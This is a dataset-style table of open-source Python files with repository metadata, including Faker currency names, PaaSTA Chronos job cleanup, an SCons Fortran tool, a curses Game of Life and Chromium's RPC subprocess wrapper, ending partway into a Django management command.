text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
|---|---|---|---|---|---|---|
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.classifiers as classifiers
import weka.experiments as experiments
import weka.plot.experiments as plot
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
def test_plot_experiment(self):
"""
Tests the plot_experiment method.
"""
datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff"), self.datafile("autoPrice.arff")]
cls = [
classifiers.Classifier("weka.classifiers.trees.REPTree"),
classifiers.Classifier("weka.classifiers.functions.LinearRegression"),
classifiers.Classifier("weka.classifiers.functions.SMOreg"),
]
outfile = self.tempfile("results-rs.arff")
exp = experiments.SimpleRandomSplitExperiment(
classification=False,
runs=10,
percentage=66.6,
preserve_order=False,
datasets=datasets,
classifiers=cls,
result=outfile)
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
matrix = experiments.ResultMatrix("weka.experiment.ResultMatrixPlainText")
tester = experiments.Tester("weka.experiment.PairedCorrectedTTester")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Correlation_coefficient").index
tester.instances = data
tester.header(comparison_col)
tester.multi_resultset_full(0, comparison_col)
# plot
plot.plot_experiment(matrix, title="Random split (w/ StdDev)", measure="Correlation coefficient", show_stdev=True, wait=False)
plot.plot_experiment(matrix, title="Random split", measure="Correlation coefficient", wait=False)
def suite():
"""
Returns the test suite.
:return: the test suite
:rtype: unittest.TestSuite
"""
return unittest.TestLoader().loadTestsFromTestCase(TestExperiments)
if __name__ == '__main__':
jvm.start()
unittest.TextTestRunner().run(suite())
jvm.stop()
|
nvoron23/python-weka-wrapper
|
tests/wekatests/plottests/experiments.py
|
Python
|
gpl-3.0
| 2,900
| 0.002759
|
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
# Format: (code, name)
currencies = (
("AED", "Dírham de los Emiratos Árabes Unidos"),
("AFN", "Afghaní"),
("ALL", "Lek albanés"),
("AMD", "Dram armenio"),
("ANG", "Florín de las Antillas Holandesas"),
("AOA", "Kwanza angoleño"),
("ARS", "Peso argentino"),
("AUD", "Dólar australiano"),
("AWG", "Florín arubeño"),
("AZN", "Manat azerbaiyano"),
("BAM", "Marco bosnioherzegovino"),
("BBD", "Dólar barbadense"),
("BDT", "Taka bangladesí"),
("BGN", "Lev búlgaro"),
("BHD", "Dinar bahreiní"),
("BIF", "Franco burundés"),
("BMD", "Dólar de Bermudas"),
("BND", "Dólar bruneano"),
("BOB", "Boliviano"),
("BRL", "Real brasileño"),
("BSD", "Dólar bahameño"),
("BTN", "Ngultrum butanés"),
("BWP", "Pula de Botswana"),
("BYR", "Rublio bielurruso"),
("BZD", "Dólar beliceño"),
("CAD", "Dólar canadiense"),
("CDF", "Franco congolés"),
("CHF", "Franco suizo"),
("CLP", "Peso chileno"),
("CNY", "Yuan"),
("COP", "Peso colombiano"),
("CRC", "Colón costarricense"),
("CUC", "Peso cubano convertible"),
("CUP", "Peso subano"),
("CVE", "Escudo de Cabo Verde"),
("CZK", "Corona checa"),
("DJF", "Franco yibutiano"),
("DKK", "Corona danesa"),
("DOP", "Peso dominicano"),
("DZD", "Dinar argelino"),
("EGP", "Libra egipcia"),
("ERN", "Nafka"),
("ETB", "Bir de Etiopía"),
("EUR", "Euro"),
("FJD", "Dólar fiyiano"),
("FKP", "Libra de las islas Falkland"),
("GBP", "Libra esterlina"),
("GEL", "Larí georgiano"),
("GGP", "Libra de Guernsey"),
("GHS", "Cedi"),
("GIP", "Libra de Gibraltar"),
("GMD", "Dalasi"),
("GNF", "Franco guineano"),
("GTQ", "Quetzal guatemalteco"),
("GYD", "Dólar guyanés"),
("HKD", "Dólar hongkonés"),
("HNL", "Lempira hondureño"),
("HRK", "Kuna croata"),
("HTG", "Gourde haitiano"),
("HUF", "Forinto húngaro"),
("IDR", "Rupia indonesia"),
("ILS", "Séquel israelí"),
("NIS", "Nuevo Séquel israelí"),
("IMP", "Libra manesa"),
("INR", "Rupia india"),
("IQD", "Dinar iraquí"),
("IRR", "Rial iraní"),
("ISK", "Corona islandesa"),
("JEP", "Libra de Jersey"),
("JMD", "Dólar jamaicano"),
("JOD", "Dinar jordano"),
("JPY", "Yen japonés"),
("KES", "Chelín keniano"),
("KGS", "Som kirguís"),
("KHR", "Riel camboyano"),
("KMF", "Franco comorense"),
("KPW", "Won norcoreano"),
("KRW", "Krahn Occidental"),
("KWD", "Dinar kuwaití"),
("KYD", "Dólar de las islas Cayman"),
("KZT", "Tenge kazako"),
("LAK", "Kip laosiano"),
("LBP", "Libra libanesa"),
("LKR", "Rupia esrilanquesa"),
("LRD", "Dólar liberiano"),
("LSL", "Loti lesothense"),
("LTL", "Litas lituana"),
("LYD", "Dinar libio"),
("MAD", "Dirham marroquí"),
("MDL", "Leu moldavo"),
("MGA", "Ariary malgache"),
("MKD", "Denar normacedonio"),
("MMK", "Kyat birmano"),
("MNT", "Tugrik mongol"),
("MOP", "Pataca macaense"),
("MRO", "Ouguiya mauritano"),
("MUR", "Rupia mauritana"),
("MVR", "Rupia de Maldivas"),
("MWK", "Kwacha malauí"),
("MXN", "Peso mexicano"),
("MYR", "Ringgit"),
("MZN", "Metical mozambiqueño"),
("NAD", "Dólar namibio"),
("NGN", "Naira nigeriano"),
("NIO", "Córdoba nicaragüense"),
("NOK", "Corona noruega"),
("NPR", "Rupia nepalí"),
("NZD", "Dólar neozelandés"),
("OMR", "Rial omaní"),
("PAB", "Balboa panameño"),
("PEN", "Sol peruano"),
("PGK", "Kina"),
("PHP", "Peso filipino"),
("PKR", "Rupia pakistaní"),
("PLN", "Złoty polaco"),
("PYG", "Guaraní paraguayo"),
("QAR", "Riyal catarí"),
("RON", "Leu rumano"),
("RSD", "Dinar serbio"),
("RUB", "Rublo ruso"),
("RWF", "Franco ruandés"),
("SAR", "Riyal saudí"),
("SBD", "Dólar de las islas Solomon"),
("SCR", "Rupia seychellense"),
("SDG", "Libra sudanesa"),
("SEK", "Corona sueca"),
("SGD", "Dólar de Singapur"),
("SHP", "Libra de Santa Elena"),
("SLL", "Leona"),
("SOS", "Chelín somalí"),
("SPL", "Luigino"),
("SRD", "Dólar surinamés"),
("STD", "Dobra santotomense"),
("SVC", "Colón salvadoreño"),
("SYP", "Libra siria"),
("SZL", "Lilangeni"),
("THB", "Baht tailandés"),
("TJS", "Somoni tayiko"),
("TMT", "Manat turcomano"),
("TND", "Dinar tunecino"),
("TOP", "Pa'anga tongano"),
("TRY", "Lira turca"),
("TTD", "Dólar de Trinidad and Tobago"),
("TVD", "Dólar tuvaluano"),
("TWD", "Nuevo dólar taiwanés"),
("TZS", "Chelín tanzano"),
("UAH", "Grivna ucraniano"),
("UGX", "Chelín ugandés"),
("USD", "Dólar de Estados Unidos"),
("UYU", "Peso uruguayo"),
("UZS", "Soʻm Uzbekistani"),
("VEF", "Bolívar venezolano"),
("VND", "Đồng vietnamita"),
("VUV", "Vanuatu vatu"),
("WST", "Tālā samoano"),
("XAF", "Franco centro africano"),
("XCD", "Dólar del Caribe Oriental"),
("XDR", "Derechos especiales de giro"),
("XOF", "Franco de África occidental"),
("XPF", "Franco CFP"),
("YER", "Rial yemení"),
("ZAR", "Rand sudafricano"),
("ZMW", "Kwacha zambiano"),
("ZWD", "Dólar zimbabuense"),
)
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return self.numerify(self.random_element(self.price_formats)) + "\N{no-break space}\N{euro sign}"
|
joke2k/faker
|
faker/providers/currency/es_ES/__init__.py
|
Python
|
mit
| 6,293
| 0.000161
|
import pytest
from formulaic.parser.types import Factor, Term
class TestTerm:
@pytest.fixture
def term1(self):
return Term([Factor("c"), Factor("b")])
@pytest.fixture
def term2(self):
return Term([Factor("c"), Factor("d")])
@pytest.fixture
def term3(self):
return Term([Factor("a"), Factor("b"), Factor("c")])
def test_mul(self, term1, term2):
assert str(term1 * term2) == "b:c:d"
with pytest.raises(TypeError):
term1 * 1
def test_hash(self, term1):
assert hash(term1) == hash("b:c")
def test_equality(self, term1, term2):
assert term1 == term1
assert term1 == "b:c"
assert term1 != term2
assert term1 != 1
def test_sort(self, term1, term2, term3):
assert term1 < term2
assert term2 < term3
assert term1 < term3
assert not (term3 < term1)
with pytest.raises(TypeError):
term1 < 1
def test_repr(self, term1):
assert repr(term1) == "b:c"
|
matthewwardrop/formulaic
|
tests/parser/types/test_term.py
|
Python
|
mit
| 1,044
| 0
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./cleanup_chronos_jobs.py [options]
Clean up chronos jobs that aren't supposed to run on this cluster by deleting them.
Gets the current job list from chronos, and then a 'valid_job_list'
via chronos_tools.get_chronos_jobs_for_cluster
If a job is deployed by chronos but not in the expected list, it is deleted.
Any tasks associated with that job are also deleted.
- -d <SOA_DIR>, --soa-dir <SOA_DIR>: Specify a SOA config dir to read from
"""
import argparse
import datetime
import sys
import dateutil.parser
import pysensu_yelp
from paasta_tools import chronos_tools
from paasta_tools import monitoring_tools
from paasta_tools import utils
from paasta_tools.check_chronos_jobs import check_chronos_job_name
from paasta_tools.utils import InvalidJobNameError
from paasta_tools.utils import NoConfigurationForServiceError
from paasta_tools.utils import paasta_print
def parse_args():
parser = argparse.ArgumentParser(description='Cleans up stale chronos jobs.')
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=chronos_tools.DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
args = parser.parse_args()
return args
def execute_chronos_api_call_for_job(api_call, job):
"""Attempt a call to the Chronos api, catching any exception.
We *have* to catch Exception, because the client catches
the more specific exception thrown by the http clients
and rethrows an Exception -_-.
The chronos api returns a 204 No Content when the delete is
successful, and chronos-python only returns the body of the
response from all http calls. So, if this is successful,
then None will be returned.
https://github.com/asher/chronos-python/pull/7
We catch it here, so that the other deletes are completed.
"""
try:
return api_call(job)
except Exception as e:
return e
def cleanup_jobs(client, jobs):
"""Maps a list of jobs to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete, job)) for job in jobs]
def cleanup_tasks(client, jobs):
"""Maps a list of tasks to cleanup to a list of response objects (or exception objects) from the api"""
return [(job, execute_chronos_api_call_for_job(client.delete_tasks, job)) for job in jobs]
def format_list_output(title, job_names):
return '%s\n %s' % (title, '\n '.join(job_names))
def deployed_job_names(client):
return [job['name'] for job in client.list()]
def filter_paasta_jobs(jobs):
"""
Given a list of job name strings, return only those in the format PaaSTA expects.
:param jobs: a list of job names.
:returns: those job names in a format PaaSTA expects
"""
formatted = []
for job in jobs:
try:
# attempt to decompose it
service, instance = chronos_tools.decompose_job_id(job)
formatted.append(job)
except InvalidJobNameError:
pass
return formatted
def filter_tmp_jobs(job_names):
"""
filter temporary jobs created by chronos_rerun
"""
return [name for name in job_names if name.startswith(chronos_tools.TMP_JOB_IDENTIFIER)]
def filter_expired_tmp_jobs(client, job_names, cluster, soa_dir):
"""
Given a list of temporary jobs, find those ready to be removed. Their
suitablity for removal is defined by two things:
- the job has completed (irrespective of whether it was a success or
failure)
- the job completed more than 24 hours ago
"""
expired = []
for job_name in job_names:
service, instance = chronos_tools.decompose_job_id(job_name)
temporary_jobs = chronos_tools.get_temporary_jobs_for_service_instance(
client=client,
service=service,
instance=instance,
)
for job in temporary_jobs:
last_run_time, last_run_state = chronos_tools.get_status_last_run(job)
try:
chronos_job_config = chronos_tools.load_chronos_job_config(
service=service,
instance=instance,
cluster=cluster,
soa_dir=soa_dir,
)
interval = chronos_job_config.get_schedule_interval_in_seconds() or 0
except NoConfigurationForServiceError:
# If we can't get the job's config, default to cleanup after 1 day
interval = 0
if last_run_state != chronos_tools.LastRunState.NotRun:
if ((datetime.datetime.now(dateutil.tz.tzutc()) -
dateutil.parser.parse(last_run_time)) >
max(datetime.timedelta(seconds=interval), datetime.timedelta(days=1))):
expired.append(job_name)
return expired
def main():
args = parse_args()
soa_dir = args.soa_dir
config = chronos_tools.load_chronos_config()
client = chronos_tools.get_chronos_client(config)
system_paasta_config = utils.load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
running_jobs = set(deployed_job_names(client))
expected_service_jobs = {chronos_tools.compose_job_id(*job) for job in
chronos_tools.get_chronos_jobs_for_cluster(soa_dir=args.soa_dir)}
all_tmp_jobs = set(filter_tmp_jobs(filter_paasta_jobs(running_jobs)))
expired_tmp_jobs = set(filter_expired_tmp_jobs(client, all_tmp_jobs, cluster=cluster, soa_dir=soa_dir))
valid_tmp_jobs = all_tmp_jobs - expired_tmp_jobs
to_delete = running_jobs - expected_service_jobs - valid_tmp_jobs
task_responses = cleanup_tasks(client, to_delete)
task_successes = []
task_failures = []
for response in task_responses:
if isinstance(response[-1], Exception):
task_failures.append(response)
else:
task_successes.append(response)
job_responses = cleanup_jobs(client, to_delete)
job_successes = []
job_failures = []
for response in job_responses:
if isinstance(response[-1], Exception):
job_failures.append(response)
else:
job_successes.append(response)
try:
(service, instance) = chronos_tools.decompose_job_id(response[0])
monitoring_tools.send_event(
check_name=check_chronos_job_name(service, instance),
service=service,
overrides={},
soa_dir=soa_dir,
status=pysensu_yelp.Status.OK,
output="This instance was removed and is no longer supposed to be scheduled.",
)
except InvalidJobNameError:
# If we deleted some bogus job with a bogus jobid that could not be parsed,
# Just move on, no need to send any kind of paasta event.
pass
if len(to_delete) == 0:
paasta_print('No Chronos Jobs to remove')
else:
if len(task_successes) > 0:
paasta_print(format_list_output(
"Successfully Removed Tasks (if any were running) for:",
[job[0] for job in task_successes],
))
# if there are any failures, print and exit appropriately
if len(task_failures) > 0:
paasta_print(format_list_output("Failed to Delete Tasks for:", [job[0] for job in task_failures]))
if len(job_successes) > 0:
paasta_print(format_list_output("Successfully Removed Jobs:", [job[0] for job in job_successes]))
# if there are any failures, print and exit appropriately
if len(job_failures) > 0:
paasta_print(format_list_output("Failed to Delete Jobs:", [job[0] for job in job_failures]))
if len(job_failures) > 0 or len(task_failures) > 0:
sys.exit(1)
if __name__ == "__main__":
main()
|
somic/paasta
|
paasta_tools/cleanup_chronos_jobs.py
|
Python
|
apache-2.0
| 8,610
| 0.002323
|
#!/usr/bin/env python
import io
import os
import sys
from efesto.Version import version
from setuptools import find_packages, setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
os.system('python setup.py bdist_wheel upload')
sys.exit()
readme = io.open('README.md', 'r', encoding='utf-8').read()
setup(
name='efesto',
description='RESTful (micro)server that can generate an API in minutes.',
long_description=readme,
long_description_content_type='text/markdown',
url='https://github.com/getefesto/efesto',
author='Jacopo Cascioli',
author_email='noreply@jacopocascioli.com',
license='GPL3',
version=version,
packages=find_packages(),
tests_require=[
'pytest',
'pytest-mock',
'pytest-falcon'
],
setup_requires=['pytest-runner'],
install_requires=[
'falcon>=1.4.1',
'falcon-cors>=1.1.7',
'psycopg2-binary>=2.7.5',
'peewee>=3.7.1',
'click==6.7',
'colorama>=0.4.0',
'aratrum>=0.3.2',
'python-rapidjson>=0.6.3',
'pyjwt>=1.6.4',
'ruamel.yaml>=0.15.74'
],
classifiers=[
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
],
entry_points="""
[console_scripts]
efesto=efesto.Cli:Cli.main
"""
)
|
getefesto/efesto
|
setup.py
|
Python
|
gpl-3.0
| 1,723
| 0
|
"""SCons.Tool.sunf90
Tool-specific initialization for sunf90, the Sun Studio F90 compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf90.py 2014/03/02 14:18:15 garyo"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf90', 'f90']
def generate(env):
"""Add Builders and construction variables for sun f90 compiler to an
Environment."""
add_all_to_env(env)
fcomp = env.Detect(compilers) or 'f90'
env['FORTRAN'] = fcomp
env['F90'] = fcomp
env['SHFORTRAN'] = '$FORTRAN'
env['SHF90'] = '$F90'
env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
env['SHF90FLAGS'] = SCons.Util.CLVar('$F90FLAGS -KPIC')
def exists(env):
return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
michalliu/OpenWrt-Firefly-Libraries
|
staging_dir/host/lib/scons-2.3.1/SCons/Tool/sunf90.py
|
Python
|
gpl-2.0
| 2,198
| 0.003185
|
#!/usr/bin/env python3
'''Conway's Game of Life in a Curses Terminal Window
'''
import curses
import time
from GameOfLife import NumpyWorld
from GameOfLife import Patterns
from curses import ( COLOR_BLACK, COLOR_BLUE, COLOR_CYAN,
COLOR_GREEN, COLOR_MAGENTA, COLOR_RED,
COLOR_WHITE, COLOR_YELLOW )
class CursesWorld(NumpyWorld):
'''
Display a Game of Life in a terminal window using curses.
'''
colors = [COLOR_WHITE,COLOR_YELLOW,COLOR_MAGENTA,
COLOR_CYAN,COLOR_RED,COLOR_GREEN,COLOR_BLUE]
def __init__(self,window):
'''
:param: window - curses window
'''
h,w = window.getmaxyx()
super(CursesWorld,self).__init__(w,h-1)
self.w = window
self.interval = 0
for n,fg in enumerate(self.colors):
curses.init_pair(n+1,fg,COLOR_BLACK)
@property
def gps(self):
'''
Generations per second.
'''
try:
return self._gps
except AttributeError:
pass
self._gps = 0
return self._gps
@gps.setter
def gps(self,newValue):
self._gps = int(newValue)
def colorForCell(self,age):
'''
Returns a curses color_pair for a cell, chosen by the cell's age.
'''
n = min(age // 100,len(self.colors)-1)
return curses.color_pair(n+1)
def handle_input(self):
'''
Accepts input from the user and acts on it.
Key Action
-----------------
q exit()
Q exit()
+ increase redraw interval by 10 milliseconds
- decrease redraw interval by 10 milliseconds
'''
c = self.w.getch()
if c == ord('q') or c == ord('Q'):
exit()
if c == ord('+'):
self.interval += 10
if c == ord('-'):
self.interval -= 10
if self.interval < 0:
self.interval = 0
@property
def status(self):
'''
Format string for the status line.
'''
try:
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
except AttributeError:
pass
s = ['Q to quit\t',
'{self.generation:>10} G',
'{self.gps:>4} G/s',
'Census: {a:>5}/{t:<5}',
'{self.interval:>4} ms +/-']
self._status = ' '.join(s)
return self._status.format(self=self,
a=len(self.alive),
t=self.cells.size)
def draw(self):
'''
:return: None
Updates each character in the curses window with
the appropriate colored marker for each cell in the world.
Moves the cursor to bottom-most line, left-most column
when finished.
'''
for y in range(self.height):
for x in range(self.width):
c = self[x,y]
self.w.addch(y,x,self.markers[c > 0],self.colorForCell(c))
self.w.addstr(self.height,2,self.status)
self.w.move(self.height,1)
def run(self,stop=-1,interval=0):
'''
:param: stop - optional integer
:param: interval - optional integer
:return: None
This method will run the simulation described by world until the
given number of generations specified by ''stop'' has been met.
The default value will cause the simulation to run until interrupted
by the user.
The interval is number of milliseconds to pause between generations.
The default value of zero allows the simulation to run as fast as
possible.
The simulation is displayed via curses in a terminal window and
displays a status line at the bottom of the window.
The simulation can be stopped by the user pressing the keys 'q' or
'Q'. The interval between simulation steps can be increased with
the plus key '+' or decreased with the minus key '-' by increments
of 10 milliseconds.
'''
self.w.clear()
self.interval = interval
try:
while True:
if self.generation == stop:
break
self.handle_input()
t0 = time.time()
self.step()
self.draw()
self.w.refresh()
if self.interval:
curses.napms(self.interval)
t1 = time.time()
self.gps = 1/(t1-t0)
except KeyboardInterrupt:
pass
def main(stdscr,argv):
w = CursesWorld(stdscr)
if len(argv) == 1:
raise ValueError("no patterns specified.")
for thing in argv[1:]:
name,_,where = thing.partition(',')
try:
x,y = map(int,where.split(','))
except:
x,y = 0,0
w.addPattern(Patterns[name],x=x,y=y)
stdscr.nodelay(True)
w.run()
def usage(argv,msg=None,exit_value=-1):
usagefmt = 'usage: {name} [[pattern_name],[X,Y]] ...'
namefmt = '\t{n}'
print(usagefmt.format(name=os.path.basename(argv[0])))
if msg:
print(msg)
print('pattern names:')
[print(namefmt.format(n=name)) for name in Patterns.keys()]
exit(exit_value)
if __name__ == '__main__':
import sys
import os
from curses import wrapper
try:
wrapper(main,sys.argv)
except KeyError as e:
usage(sys.argv,'unknown pattern {p}'.format(p=str(e)))
except ValueError as e:
usage(sys.argv,str(e))
|
JnyJny/GameOfLife
|
contrib/NCGameOfLife.py
|
Python
|
mit
| 5,897
| 0.010853
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""RPC compatible subprocess-type module.
This module defined both a task-side process class as well as a controller-side
process wrapper for easier access and usage of the task-side process.
"""
import logging
import os
import subprocess
import sys
import threading
import time
#pylint: disable=relative-import
import common_lib
# Map swarming_client to use subprocess42
sys.path.append(common_lib.SWARMING_DIR)
from utils import subprocess42
class TimeoutError(Exception):
pass
class ControllerProcessWrapper(object):
"""Controller-side process wrapper class.
This class provides a more intuitive interface to task-side processes
than calling the methods directly using the RPC object.
"""
def __init__(self, rpc, cmd, verbose=False, detached=False, cwd=None,
key=None, shell=None):
logging.debug('Creating a process with cmd=%s', cmd)
self._rpc = rpc
self._key = rpc.subprocess.Process(cmd, key)
logging.debug('Process created with key=%s', self._key)
if verbose:
self._rpc.subprocess.SetVerbose(self._key)
if detached:
self._rpc.subprocess.SetDetached(self._key)
if cwd:
self._rpc.subprocess.SetCwd(self._key, cwd)
if shell:
self._rpc.subprocess.SetShell(self._key)
self._rpc.subprocess.Start(self._key)
@property
def key(self):
return self._key
def Terminate(self):
logging.debug('Terminating process %s', self._key)
return self._rpc.subprocess.Terminate(self._key)
def Kill(self):
logging.debug('Killing process %s', self._key)
self._rpc.subprocess.Kill(self._key)
def Delete(self):
return self._rpc.subprocess.Delete(self._key)
def GetReturncode(self):
return self._rpc.subprocess.GetReturncode(self._key)
def ReadStdout(self):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
return self._rpc.subprocess.ReadStdout(self._key)
def ReadStderr(self):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadStderr(self._key)
def ReadOutput(self):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return self._rpc.subprocess.ReadOutput(self._key)
def Wait(self, timeout=None):
return self._rpc.subprocess.Wait(self._key, timeout)
def Poll(self):
return self._rpc.subprocess.Poll(self._key)
def GetPid(self):
return self._rpc.subprocess.GetPid(self._key)
class Process(object):
"""Implements a task-side non-blocking subprocess.
This non-blocking subprocess allows the caller to continue operating while
also able to interact with this subprocess based on a key returned to
the caller at the time of creation.
Creation args are set via Set* methods called after calling Process but
before calling Start. This is due to a limitation of the XML-RPC
implementation not supporting keyword arguments.
"""
_processes = {}
_process_next_id = 0
_creation_lock = threading.Lock()
def __init__(self, cmd, key):
self.stdout = ''
self.stderr = ''
self.key = key
self.cmd = cmd
self.proc = None
self.cwd = None
self.shell = False
self.verbose = False
self.detached = False
self.complete = False
self.data_lock = threading.Lock()
self.stdout_file = open(self._CreateOutputFilename('stdout'), 'wb+')
self.stderr_file = open(self._CreateOutputFilename('stderr'), 'wb+')
def _CreateOutputFilename(self, fname):
return os.path.join(common_lib.GetOutputDir(), '%s.%s' % (self.key, fname))
def __str__(self):
return '%r, cwd=%r, verbose=%r, detached=%r' % (
self.cmd, self.cwd, self.verbose, self.detached)
def _reader(self):
for pipe, data in self.proc.yield_any():
with self.data_lock:
if pipe == 'stdout':
self.stdout += data
self.stdout_file.write(data)
self.stdout_file.flush()
if self.verbose:
sys.stdout.write(data)
else:
self.stderr += data
self.stderr_file.write(data)
self.stderr_file.flush()
if self.verbose:
sys.stderr.write(data)
self.complete = True
@classmethod
def KillAll(cls):
for key in cls._processes:
cls.Kill(key)
@classmethod
def Process(cls, cmd, key=None):
with cls._creation_lock:
if not key:
key = 'Process%d' % cls._process_next_id
cls._process_next_id += 1
if key in cls._processes:
raise KeyError('Key %s already in use' % key)
logging.debug('Creating process %s with cmd %r', key, cmd)
cls._processes[key] = cls(cmd, key)
return key
def _Start(self):
logging.info('Starting process %s', self)
self.proc = subprocess42.Popen(self.cmd, stdout=subprocess42.PIPE,
stderr=subprocess42.PIPE,
detached=self.detached, cwd=self.cwd,
shell=self.shell)
threading.Thread(target=self._reader).start()
@classmethod
def Start(cls, key):
cls._processes[key]._Start()
@classmethod
def SetCwd(cls, key, cwd):
"""Sets the process's cwd."""
logging.debug('Setting %s cwd to %s', key, cwd)
cls._processes[key].cwd = cwd
@classmethod
def SetShell(cls, key):
"""Sets the process's shell arg to True."""
logging.debug('Setting %s.shell = True', key)
cls._processes[key].shell = True
@classmethod
def SetDetached(cls, key):
"""Creates a detached process."""
logging.debug('Setting %s.detached = True', key)
cls._processes[key].detached = True
@classmethod
def SetVerbose(cls, key):
"""Sets the stdout and stderr to be emitted locally."""
logging.debug('Setting %s.verbose = True', key)
cls._processes[key].verbose = True
@classmethod
def Terminate(cls, key):
logging.debug('Terminating process %s', key)
cls._processes[key].proc.terminate()
@classmethod
def Kill(cls, key):
logging.debug('Killing process %s', key)
cls._processes[key].proc.kill()
@classmethod
def Delete(cls, key):
if cls.GetReturncode(key) is None:
logging.warning('Killing %s before deleting it', key)
cls.Kill(key)
logging.debug('Deleting process %s', key)
cls._processes.pop(key)
@classmethod
def GetReturncode(cls, key):
return cls._processes[key].proc.returncode
@classmethod
def ReadStdout(cls, key):
"""Returns all stdout since the last call to ReadStdout.
This call allows the user to read stdout while the process is running.
However each call will flush the local stdout buffer. In order to make
multiple calls to ReadStdout and to retain the entire output the results
of this call will need to be buffered in the calling code.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stdout data
stdout = proc.stdout
proc.stdout = ''
return stdout
@classmethod
def ReadStderr(cls, key):
"""Returns all stderr read since the last call to ReadStderr.
See ReadStdout for additional details.
"""
proc = cls._processes[key]
with proc.data_lock:
# Perform a "read" on the stderr data
stderr = proc.stderr
proc.stderr = ''
return stderr
@classmethod
def ReadOutput(cls, key):
"""Returns the (stdout, stderr) since the last Read* call.
See ReadStdout for additional details.
"""
return cls.ReadStdout(key), cls.ReadStderr(key)
@classmethod
def Wait(cls, key, timeout=None):
"""Wait for the process to complete.
We wait for all of the output to be written before returning. This solves
a race condition found on Windows where the output can lag behind the
wait call.
Raises:
TimeoutError if the process doesn't finish in the specified timeout.
"""
end = None if timeout is None else timeout + time.time()
while end is None or end > time.time():
if cls._processes[key].complete:
return
time.sleep(0.05)
raise TimeoutError()
@classmethod
def Poll(cls, key):
return cls._processes[key].proc.poll()
@classmethod
def GetPid(cls, key):
return cls._processes[key].proc.pid
|
Teamxrtc/webrtc-streaming-node
|
third_party/webrtc/src/chromium/src/testing/legion/process.py
|
Python
|
mit
| 8,760
| 0.010046
|
import fnmatch
import glob
import os
import re
import sys
from functools import total_ordering
from itertools import dropwhile
import django
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.temp import NamedTemporaryFile
from django.core.management.base import BaseCommand, CommandError
from django.core.management.utils import (
